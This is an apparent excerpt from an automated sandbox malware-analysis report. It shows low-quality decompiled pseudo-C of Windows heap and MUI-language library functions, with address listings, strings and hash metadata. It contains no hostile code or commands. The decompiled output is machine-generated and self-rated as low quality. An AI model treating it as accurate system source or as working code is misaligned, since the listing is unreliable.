								}
								if(_t280 == 0) {
									_t280 = 0;
									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E010ABB40(_t257,  &_v68, _t243);
								if(L010743C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E010B1370(_t278, 0x1044e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01084620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E010AF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E010B1370(_v16, 0x1044e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E010ABB40(_t262,  &_v68, _t244);
								if(L010743C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E010B1370(_t282, 0x1044e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E010ABB40(_t262,  &_v68, _t201);
							if(L010743C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01084620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E010AF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E010B1370(_t280, 0x1044e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E010ABB40(_t267,  &_v68, _t245);
							if(L010743C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E010B1370(_t284, 0x1044e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E010ABB40(_t267,  &_v68, _t224);
						if(L010743C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L010877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}










































                                                                                                            0x01073d3c
                                                                                                            0x01073d42
                                                                                                            0x01073d44
                                                                                                            0x01073d46
                                                                                                            0x01073d49
                                                                                                            0x01073d4c
                                                                                                            0x01073d4f
                                                                                                            0x01073d52
                                                                                                            0x01073d55
                                                                                                            0x01073d58
                                                                                                            0x01073d5b
                                                                                                            0x01073d5f
                                                                                                            0x01073d61
                                                                                                            0x01073d66
                                                                                                            0x010c8213
                                                                                                            0x010c8218
                                                                                                            0x01074085
                                                                                                            0x01074088
                                                                                                            0x0107408e
                                                                                                            0x01074094
                                                                                                            0x0107409a
                                                                                                            0x010740a0
                                                                                                            0x010740a6
                                                                                                            0x010740a9
                                                                                                            0x010740af
                                                                                                            0x010740b6
                                                                                                            0x010740bd
                                                                                                            0x010740bd
                                                                                                            0x01073d83
                                                                                                            0x010c821f
                                                                                                            0x010c8229
                                                                                                            0x010c8238
                                                                                                            0x010c8238
                                                                                                            0x010c823d
                                                                                                            0x010c823d
                                                                                                            0x01073da0
                                                                                                            0x01073daf
                                                                                                            0x01073db5
                                                                                                            0x01073dba
                                                                                                            0x01073dba
                                                                                                            0x01073dd4
                                                                                                            0x01073e94
                                                                                                            0x01073eab
                                                                                                            0x01073f6d
                                                                                                            0x01073f84
                                                                                                            0x0107406b
                                                                                                            0x0107406b
                                                                                                            0x0107406e
                                                                                                            0x0107406e
                                                                                                            0x01074070
                                                                                                            0x01074074
                                                                                                            0x010c8351
                                                                                                            0x010c8351
                                                                                                            0x0107407a
                                                                                                            0x0107407f
                                                                                                            0x010c835d
                                                                                                            0x010c8370
                                                                                                            0x010c8377
                                                                                                            0x010c8379
                                                                                                            0x010c837c
                                                                                                            0x010c837c
                                                                                                            0x010c835d
                                                                                                            0x00000000
                                                                                                            0x0107407f
                                                                                                            0x01073f8a
                                                                                                            0x01073f8d
                                                                                                            0x01073f90
                                                                                                            0x01073f95
                                                                                                            0x010c830d
                                                                                                            0x010c830f
                                                                                                            0x01073f9b
                                                                                                            0x01073fac
                                                                                                            0x01073fae
                                                                                                            0x01073fb1
                                                                                                            0x01073fb1
                                                                                                            0x01073fb6
                                                                                                            0x010c8317
                                                                                                            0x010c831a
                                                                                                            0x00000000
                                                                                                            0x01073fbc
                                                                                                            0x01073fc1
                                                                                                            0x01073fc9
                                                                                                            0x01073fd7
                                                                                                            0x01073fda
                                                                                                            0x01073fdd
                                                                                                            0x01074021
                                                                                                            0x01074021
                                                                                                            0x01074029
                                                                                                            0x01074030
                                                                                                            0x01074044
                                                                                                            0x01074046
                                                                                                            0x01074046
                                                                                                            0x01074044
                                                                                                            0x01074049
                                                                                                            0x010c8327
                                                                                                            0x010c8334
                                                                                                            0x010c8339
                                                                                                            0x010c833c
                                                                                                            0x0107404f
                                                                                                            0x0107404f
                                                                                                            0x0107404f
                                                                                                            0x01074051
                                                                                                            0x01074056
                                                                                                            0x01074063
                                                                                                            0x01074063
                                                                                                            0x01074068
                                                                                                            0x00000000
                                                                                                            0x01074068
                                                                                                            0x01073fdf
                                                                                                            0x01073fe2
                                                                                                            0x01073fe4
                                                                                                            0x01073fe7
                                                                                                            0x01073fef
                                                                                                            0x01074003
                                                                                                            0x01074005
                                                                                                            0x01074005
                                                                                                            0x0107400c
                                                                                                            0x01074013
                                                                                                            0x01074016
                                                                                                            0x01074017
                                                                                                            0x0107401b
                                                                                                            0x0107401e
                                                                                                            0x00000000
                                                                                                            0x0107401e
                                                                                                            0x01073fb6
                                                                                                            0x01073eb1
                                                                                                            0x01073eb4
                                                                                                            0x01073eb7
                                                                                                            0x01073ebc
                                                                                                            0x010c82a9
                                                                                                            0x010c82ab
                                                                                                            0x01073ec2
                                                                                                            0x01073ed3
                                                                                                            0x01073ed5
                                                                                                            0x01073ed8
                                                                                                            0x01073ed8
                                                                                                            0x01073edd
                                                                                                            0x010c82b3
                                                                                                            0x010c82b6
                                                                                                            0x00000000
                                                                                                            0x01073ee3
                                                                                                            0x01073ee8
                                                                                                            0x01073eed
                                                                                                            0x01073ef0
                                                                                                            0x01073ef3
                                                                                                            0x01073f02
                                                                                                            0x01073f05
                                                                                                            0x01073f08
                                                                                                            0x010c82c0
                                                                                                            0x010c82c3
                                                                                                            0x010c82c5
                                                                                                            0x010c82c8
                                                                                                            0x010c82d0
                                                                                                            0x010c82e4
                                                                                                            0x010c82e6
                                                                                                            0x010c82e6
                                                                                                            0x010c82ed
                                                                                                            0x010c82f4
                                                                                                            0x010c82f7
                                                                                                            0x010c82f8
                                                                                                            0x010c82fc
                                                                                                            0x010c82ff
                                                                                                            0x010c82ff
                                                                                                            0x01073f0e
                                                                                                            0x01073f11
                                                                                                            0x01073f16
                                                                                                            0x01073f1d
                                                                                                            0x01073f31
                                                                                                            0x010c8307
                                                                                                            0x010c8307
                                                                                                            0x01073f31
                                                                                                            0x01073f39
                                                                                                            0x01073f48
                                                                                                            0x01073f4d
                                                                                                            0x01073f50
                                                                                                            0x01073f50
                                                                                                            0x01073f53
                                                                                                            0x01073f58
                                                                                                            0x01073f65
                                                                                                            0x01073f65
                                                                                                            0x01073f6a
                                                                                                            0x00000000
                                                                                                            0x01073f6a
                                                                                                            0x01073edd
                                                                                                            0x01073dda
                                                                                                            0x01073ddd
                                                                                                            0x01073de0
                                                                                                            0x01073de5
                                                                                                            0x010c8245
                                                                                                            0x01073deb
                                                                                                            0x01073df7
                                                                                                            0x01073dfc
                                                                                                            0x01073dfe
                                                                                                            0x01073e01
                                                                                                            0x01073e01
                                                                                                            0x01073e06
                                                                                                            0x010c824d
                                                                                                            0x010c824f
                                                                                                            0x010c8254
                                                                                                            0x00000000
                                                                                                            0x01073e0c
                                                                                                            0x01073e11
                                                                                                            0x01073e16
                                                                                                            0x01073e19
                                                                                                            0x01073e29
                                                                                                            0x01073e2c
                                                                                                            0x01073e2f
                                                                                                            0x010c825c
                                                                                                            0x010c825f
                                                                                                            0x010c8261
                                                                                                            0x010c8264
                                                                                                            0x010c826c
                                                                                                            0x010c8280
                                                                                                            0x010c8282
                                                                                                            0x010c8282
                                                                                                            0x010c8289
                                                                                                            0x010c8290
                                                                                                            0x010c8293
                                                                                                            0x010c8294
                                                                                                            0x010c8298
                                                                                                            0x010c829b
                                                                                                            0x010c829b
                                                                                                            0x01073e35
                                                                                                            0x01073e38
                                                                                                            0x01073e3d
                                                                                                            0x01073e44
                                                                                                            0x01073e58
                                                                                                            0x010c82a3
                                                                                                            0x010c82a3
                                                                                                            0x01073e58
                                                                                                            0x01073e60
                                                                                                            0x01073e6f
                                                                                                            0x01073e74
                                                                                                            0x01073e77
                                                                                                            0x01073e77
                                                                                                            0x01073e7a
                                                                                                            0x01073e7f
                                                                                                            0x01073e8c
                                                                                                            0x01073e8c
                                                                                                            0x01073e91
                                                                                                            0x00000000
                                                                                                            0x01073e91

                                                                                                            Strings
                                                                                                            • Kernel-MUI-Language-SKU, xrefs: 01073F70
                                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 01073DC0
                                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 01073E97
                                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 01073D8C
                                                                                                            • WindowsExcludedProcs, xrefs: 01073D6F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                            • API String ID: 0-258546922
                                                                                                            • Opcode ID: 2a62705567902f92d2c52683e640a89a6d7ebe3c2f55a6104ca3a2db110c4aa1
                                                                                                            • Instruction ID: 47acc0c02ab1ca79bf4f754041427d75e7bd60967eccadef217bb83d57c1b1e1
                                                                                                            • Opcode Fuzzy Hash: 2a62705567902f92d2c52683e640a89a6d7ebe3c2f55a6104ca3a2db110c4aa1
                                                                                                            • Instruction Fuzzy Hash: 9FF15FB2D00619EFDB11DF98C980AEEBBF9FF18650F15406AE585E7250E7709E01CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 010640E1 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 29%
                                                                                                            			E010640E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0106B150();
					} else {
						E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0106B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0106B150(", passed to %s", _t29);
					}
					_push("\n");
					E0106B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1156378 = 1;
						asm("int3");
						 *0x1156378 = 0;
					}
					return 0;
				}
				return 1;
			}





                                                                                                            0x010640e6
                                                                                                            0x010640e8
                                                                                                            0x010640f1
                                                                                                            0x010c042d
                                                                                                            0x010c044c
                                                                                                            0x010c0451
                                                                                                            0x010c042f
                                                                                                            0x010c0444
                                                                                                            0x010c0449
                                                                                                            0x010c045d
                                                                                                            0x010c0466
                                                                                                            0x010c046e
                                                                                                            0x010c0474
                                                                                                            0x010c0475
                                                                                                            0x010c047a
                                                                                                            0x010c048a
                                                                                                            0x010c048c
                                                                                                            0x010c0493
                                                                                                            0x010c0494
                                                                                                            0x010c0494
                                                                                                            0x00000000
                                                                                                            0x010c049b
                                                                                                            0x00000000

                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.358500037.0000000001040000.00000040.00000800.00020000.00000000.sdmp, Offset: 01040000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_1040000_TT copy.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                                                                                            • API String ID: 0-188067316
                                                                                                            • Opcode ID: c86297a80233bd282071506ef00a219f7db4b0a79f9abbedbf86e566d85ce8aa
                                                                                                            • Instruction ID: c2317bb1dfc2b7019aaab89b9bdae98faba03fd69bd611c512316c799f4c5b7e
                                                                                                            • Opcode Fuzzy Hash: c86297a80233bd282071506ef00a219f7db4b0a79f9abbedbf86e566d85ce8aa
                                                                                                            • Instruction Fuzzy Hash: 030128F7204641EFE3799769A44DF9BB7E8DB41F34F18407DF0898F6419EA59480CA50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 0108A830 Relevance: 5.4, Strings: 4, Instructions: 350COMMONCrypto
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 70%
                                                                                                            			E0108A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
				void* _v5;
				signed short _v12;
				intOrPtr _v16;
				signed int _v20;
				signed short _v24;
				signed short _v28;
				signed int _v32;
				signed short _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				signed short* _v52;
				void* __ebx;
				void* __edi;
				void* __ebp;
				signed int _t131;
				signed char _t134;
				signed int _t138;
				char _t141;
				signed short _t142;
				void* _t146;
				signed short _t147;
				intOrPtr* _t149;
				intOrPtr _t156;
				signed int _t167;
				signed int _t168;
				signed short* _t173;
				signed short _t174;
				intOrPtr* _t182;
				signed short _t184;
				intOrPtr* _t187;
				intOrPtr _t197;
				intOrPtr _t206;
				intOrPtr _t210;
				signed short _t211;
				intOrPtr* _t212;
				signed short _t214;
				signed int _t216;
				intOrPtr _t217;
				signed char _t225;
				signed short _t235;
				signed int _t237;
				intOrPtr* _t238;
				signed int _t242;
				unsigned int _t245;
				signed int _t251;
				intOrPtr* _t252;
				signed int _t253;
				intOrPtr* _t255;
				signed int _t256;
				void* _t257;
				void* _t260;

				_t256 = __edx;
				_t206 = __ecx;
				_t235 = _a4;
				_v44 = __ecx;
				_v24 = _t235;
				if(_t235 == 0) {
					L41:
					return _t131;
				}
				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
				if(_t251 == 0) {
					__eflags =  *0x1158748 - 1;
					if( *0x1158748 >= 1) {
						__eflags =  *(__edx + 2) & 0x00000008;
						if(( *(__edx + 2) & 0x00000008) == 0) {
							_t110 = _t256 + 0xfff; // 0xfe7
							__eflags = (_t110 & 0xfffff000) - __edx;
							if((_t110 & 0xfffff000) != __edx) {
								_t197 =  *[fs:0x30];
								__eflags =  *(_t197 + 0xc);
								if( *(_t197 + 0xc) == 0) {
									_push("HEAP: ");
									E0106B150();
									_t260 = _t257 + 4;
								} else {
									E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									_t260 = _t257 + 8;
								}
								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
								E0106B150();
								_t257 = _t260 + 4;
								__eflags =  *0x1157bc8;
								if(__eflags == 0) {
									E01122073(_t206, 1, _t251, __eflags);
								}
								_t235 = _v24;
							}
						}
					}
				}
				_t134 =  *((intOrPtr*)(_t256 + 6));
				if(_t134 == 0) {
					_t210 = _t206;
					_v48 = _t206;
				} else {
					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
					_v48 = _t210;
				}
				_v5 =  *(_t256 + 2);
				do {
					if(_t235 > 0xfe00) {
						_v12 = 0xfe00;
						__eflags = _t235 - 0xfe01;
						if(_t235 == 0xfe01) {
							_v12 = 0xfdf0;
						}
						_t138 = 0;
					} else {
						_v12 = _t235 & 0x0000ffff;
						_t138 = _v5;
					}
					 *(_t256 + 2) = _t138;
					 *(_t256 + 4) =  *(_t206 + 0x54) ^ _t251;
					_t236 =  *((intOrPtr*)(_t210 + 0x18));
					if( *((intOrPtr*)(_t210 + 0x18)) == _t210) {
						_t141 = 0;
					} else {
						_t141 = (_t256 - _t210 >> 0x10) + 1;
						_v40 = _t141;
						if(_t141 >= 0xfe) {
							_push(_t210);
							E0112A80D(_t236, _t256, _t210, 0);
							_t141 = _v40;
						}
					}
					 *(_t256 + 2) =  *(_t256 + 2) & 0x000000f0;
					 *((char*)(_t256 + 6)) = _t141;
					_t142 = _v12;
					 *_t256 = _t142;
					 *(_t256 + 3) = 0;
					_t211 = _t142 & 0x0000ffff;
					 *((char*)(_t256 + 7)) = 0;
					_v20 = _t211;
					if(( *(_t206 + 0x40) & 0x00000040) != 0) {
						_t119 = _t256 + 0x10; // -8
						E010BD5E0(_t119, _t211 * 8 - 0x10, 0xfeeefeee);
						 *(_t256 + 2) =  *(_t256 + 2) | 0x00000004;
						_t211 = _v20;
					}
					_t252 =  *((intOrPtr*)(_t206 + 0xb4));
					if(_t252 == 0) {
						L56:
						_t212 =  *((intOrPtr*)(_t206 + 0xc0));
						_t146 = _t206 + 0xc0;
						goto L19;
					} else {
						if(_t211 <  *((intOrPtr*)(_t252 + 4))) {
							L15:
							_t185 = _t211;
							goto L17;
						} else {
							while(1) {
								_t187 =  *_t252;
								if(_t187 == 0) {
									_t185 =  *((intOrPtr*)(_t252 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t252 + 4)) - 1;
									goto L17;
								}
								_t252 = _t187;
								if(_t211 >=  *((intOrPtr*)(_t252 + 4))) {
									continue;
								}
								goto L15;
							}
							while(1) {
								L17:
								_t212 = E0108AB40(_t206, _t252, 1, _t185, _t211);
								if(_t212 != 0) {
									_t146 = _t206 + 0xc0;
									break;
								}
								_t252 =  *_t252;
								_t211 = _v20;
								_t185 =  *(_t252 + 0x14);
							}
							L19:
							if(_t146 != _t212) {
								_t237 =  *(_t206 + 0x4c);
								_t253 = _v20;
								while(1) {
									__eflags = _t237;
									if(_t237 == 0) {
										_t147 =  *(_t212 - 8) & 0x0000ffff;
									} else {
										_t184 =  *(_t212 - 8);
										_t237 =  *(_t206 + 0x4c);
										__eflags = _t184 & _t237;
										if((_t184 & _t237) != 0) {
											_t184 = _t184 ^  *(_t206 + 0x50);
											__eflags = _t184;
										}
										_t147 = _t184 & 0x0000ffff;
									}
									__eflags = _t253 - (_t147 & 0x0000ffff);
									if(_t253 <= (_t147 & 0x0000ffff)) {
										goto L20;
									}
									_t212 =  *_t212;
									__eflags = _t206 + 0xc0 - _t212;
									if(_t206 + 0xc0 != _t212) {
										continue;
									} else {
										goto L20;
									}
									goto L56;
								}
							}
							L20:
							_t149 =  *((intOrPtr*)(_t212 + 4));
							_t33 = _t256 + 8; // -16
							_t238 = _t33;
							_t254 =  *_t149;
							if( *_t149 != _t212) {
								_push(_t212);
								E0112A80D(0, _t212, 0, _t254);
							} else {
								 *_t238 = _t212;
								 *((intOrPtr*)(_t238 + 4)) = _t149;
								 *_t149 = _t238;
								 *((intOrPtr*)(_t212 + 4)) = _t238;
							}
							 *((intOrPtr*)(_t206 + 0x74)) =  *((intOrPtr*)(_t206 + 0x74)) + ( *_t256 & 0x0000ffff);
							_t255 =  *((intOrPtr*)(_t206 + 0xb4));
							if(_t255 == 0) {
								L36:
								if( *(_t206 + 0x4c) != 0) {
									 *(_t256 + 3) =  *(_t256 + 1) ^  *(_t256 + 2) ^  *_t256;
									 *_t256 =  *_t256 ^  *(_t206 + 0x50);
								}
								_t210 = _v48;
								_t251 = _v12 & 0x0000ffff;
								_t131 = _v20;
								_t235 = _v24 - _t131;
								_v24 = _t235;
								_t256 = _t256 + _t131 * 8;
								if(_t256 >=  *((intOrPtr*)(_t210 + 0x28))) {
									goto L41;
								} else {
									goto L39;
								}
							} else {
								_t216 =  *_t256 & 0x0000ffff;
								_v28 = _t216;
								if(_t216 <  *((intOrPtr*)(_t255 + 4))) {
									L28:
									_t242 = _t216 -  *((intOrPtr*)(_t255 + 0x14));
									_v32 = _t242;
									if( *((intOrPtr*)(_t255 + 8)) != 0) {
										_t167 = _t242 + _t242;
									} else {
										_t167 = _t242;
									}
									 *((intOrPtr*)(_t255 + 0xc)) =  *((intOrPtr*)(_t255 + 0xc)) + 1;
									_t168 = _t167 << 2;
									_v40 = _t168;
									_t206 = _v44;
									_v16 =  *((intOrPtr*)(_t168 +  *((intOrPtr*)(_t255 + 0x20))));
									if(_t216 ==  *((intOrPtr*)(_t255 + 4)) - 1) {
										 *((intOrPtr*)(_t255 + 0x10)) =  *((intOrPtr*)(_t255 + 0x10)) + 1;
									}
									_t217 = _v16;
									if(_t217 != 0) {
										_t173 = _t217 - 8;
										_v52 = _t173;
										_t174 =  *_t173;
										__eflags =  *(_t206 + 0x4c);
										if( *(_t206 + 0x4c) != 0) {
											_t245 =  *(_t206 + 0x50) ^ _t174;
											_v36 = _t245;
											_t225 = _t245 >> 0x00000010 ^ _t245 >> 0x00000008 ^ _t245;
											__eflags = _t245 >> 0x18 - _t225;
											if(_t245 >> 0x18 != _t225) {
												_push(_t225);
												E0112A80D(_t206, _v52, 0, 0);
											}
											_t174 = _v36;
											_t217 = _v16;
											_t242 = _v32;
										}
										_v28 = _v28 - (_t174 & 0x0000ffff);
										__eflags = _v28;
										if(_v28 > 0) {
											goto L34;
										} else {
											goto L33;
										}
									} else {
										L33:
										_t58 = _t256 + 8; // -16
										 *((intOrPtr*)(_v40 +  *((intOrPtr*)(_t255 + 0x20)))) = _t58;
										_t206 = _v44;
										_t217 = _v16;
										L34:
										if(_t217 == 0) {
											asm("bts eax, edx");
										}
										goto L36;
									}
								} else {
									goto L24;
								}
								while(1) {
									L24:
									_t182 =  *_t255;
									if(_t182 == 0) {
										_t216 =  *((intOrPtr*)(_t255 + 4)) - 1;
										__eflags = _t216;
										goto L28;
									}
									_t255 = _t182;
									if(_t216 >=  *((intOrPtr*)(_t255 + 4))) {
										continue;
									} else {
										goto L28;
									}
								}
								goto L28;
							}
						}
					}
					L39:
				} while (_t235 != 0);
				_t214 = _v12;
				_t131 =  *(_t206 + 0x54) ^ _t214;
				 *(_t256 + 4) = _t131;
				if(_t214 == 0) {
					__eflags =  *0x1158748 - 1;
					if( *0x1158748 >= 1) {
						_t127 = _t256 + 0xfff; // 0xfff
						_t131 = _t127 & 0xfffff000;
						__eflags = _t131 - _t256;
						if(_t131 != _t256) {
							_t156 =  *[fs:0x30];
							__eflags =  *(_t156 + 0xc);
							if( *(_t156 + 0xc) == 0) {
								_push("HEAP: ");
								E0106B150();
							} else {
								E0106B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock");
							_t131 = E0106B150();
							__eflags =  *0x1157bc8;
							if(__eflags == 0) {
								_t131 = E01122073(_t206, 1, _t251, __eflags);
							}
						}
					}
				}
				goto L41;
			}























































                                                                                                            0x0108a83a
                                                                                                            0x0108a83c
                                                                                                            0x0108a83e
                                                                                                            0x0108a841
                                                                                                            0x0108a844
                                                                                                            0x0108a84a
                                                                                                            0x0108aa53
                                                                                                            0x0108aa59
                                                                                                            0x0108aa59
                                                                                                            0x0108a858
                                                                                                            0x0108a85e
                                                                                                            0x0108aaf5
                                                                                                            0x0108aafc
                                                                                                            0x010d229e
                                                                                                            0x010d22a2
                                                                                                            0x010d22a8
                                                                                                            0x010d22b3
                                                                                                            0x010d22b5
                                                                                                            0x010d22bb
                                                                                                            0x010d22c1
                                                                                                            0x010d22c5
                                                                                                            0x010d22e6
                                                                                                            0x010d22eb
                                                                                                            0x010d22f0
                                                                                                            0x010d22c7
                                                                                                            0x010d22dc
                                                                                                            0x010d22e1
                                                                                                            0x010d22e1
                                                                                                            0x010d22f3
                                                                                                            0x010d22f8
                                                                                                            0x010d22fd
                                                                                                            0x010d2300
                                                                                                            0x010d2307
                                                                                                            0x010d230e
                                                                                                            0x010d230e
                                                                                                            0x010d2313
                                                                                                            0x010d2313
                                                                                                            0x010d22b5
                                                                                                            0x010d22a2
                                                                                                            0x0108aafc
                                                                                                            0x0108a864
                                                                                                            0x0108a869
                                                                                                            0x0108aa5c
                                                                                                            0x0108aa5e
                                                                                                            0x0108a86f
                                                                                                            0x0108a87f
                                                                                                            0x0108a885
                                                                                                            0x0108a885
                                                                                                            0x0108a88b
                                                                                                            0x0108a890
                                                                                                            0x0108a896
                                                                                                            0x0108ab0c
                                                                                                            0x0108ab0f
                                                                                                            0x0108ab15
                                                                                                            0x010d2320
                                                                                                            0x010d2320
                                                                                                            0x0108ab1b
                                                                                                            0x0108a89c
                                                                                                            0x0108a89f
                                                                                                            0x0108a8a2
                                                                                                            0x0108a8a2
                                                                                                            0x0108a8a5
                                                                                                            0x0108a8af
                                                                                                            0x0108a8b3
                                                                                                            0x0108a8b8
                                                                                                            0x0108aa66
                                                                                                            0x0108a8be
                                                                                                            0x0108a8c5
                                                                                                            0x0108a8c6
                                                                                                            0x0108a8ce
                                                                                                            0x010d2328
                                                                                                            0x010d2332
                                                                                                            0x010d2337
                                                                                                            0x010d2337
                                                                                                            0x0108a8ce
                                                                                                            0x0108a8d4
                                                                                                            0x0108a8d8
                                                                                                            0x0108a8db
                                                                                                            0x0108a8de
                                                                                                            0x0108a8e1
                                                                                                            0x0108a8e5
                                                                                                            0x0108a8e8
                                                                                                            0x0108a8f0
                                                                                                            0x0108a8f3
                                                                                                            0x010d234c
                                                                                                            0x010d2350
                                                                                                            0x010d2355
                                                                                                            0x010d2359
                                                                                                            0x010d2359
                                                                                                            0x0108a8f9
                                                                                                            0x0108a901
                                                                                                            0x0108aae4
                                                                                                            0x0108aae4
                                                                                                            0x0108aaea
                                                                                                            0x00000000
                                                                                                            0x0108a907
                                                                                                            0x0108a90a
                                                                                                            0x0108a91d
                                                                                                            0x0108a91d
                                                                                                            0x00000000
                                                                                                            0x0108a910
                                                                                                            0x0108a910
                                                                                                            0x0108a910
                                                                                                            0x0108a914
                                                                                                            0x0108a924
                                                                                                            0x0108a924
                                                                                                            0x0108a924
                                                                                                            0x0108a924
                                                                                                            0x0108a916
                                                                                                            0x0108a91b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x0108a91b
                                                                                                            0x0108a925
                                                                                                            0x0108a925
                                                                                                            0x0108a932
                                                                                                            0x0108a936
                                                                                                            0x0108a93c
                                                                                                            0x0108a93c
                                                                                                            0x0108a93c
                                                                                                            0x0108ab22
                                                                                                            0x0108ab24
                                                                                                            0x0108ab27
                                                                                                            0x0108ab27
                                                                                                            0x0108a942
                                                                                                            0x0108a944
                                                                                                            0x0108aaba
                                                                                                            0x0108aabd
                                                                                                            0x0108aac0
                                                                                                            0x0108aac0
                                                                                                            0x0108aac2
                                                                                                            0x0108ab2f
                                                                                                            0x0108aac4
                                                                                                            0x0108aac4
                                                                                                            0x0108aac7
                                                                                                            0x0108aaca
                                                                                                            0x0108aacc
                                                                                                            0x0108aace
                                                                                                            0x0108aace
                                                                                                            0x0108aace
                                                                                                            0x0108aad1
                                                                                                            0x0108aad1
                                                                                                            0x0108aad7
                                                                                                            0x0108aad9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x010d2361
                                                                                                            0x010d2369
                                                                                                            0x010d236b
                                                                                                            0x00000000
                                                                                                            0x010d2371
                                                                                                            0x00000000
                                                                                                            0x010d2371
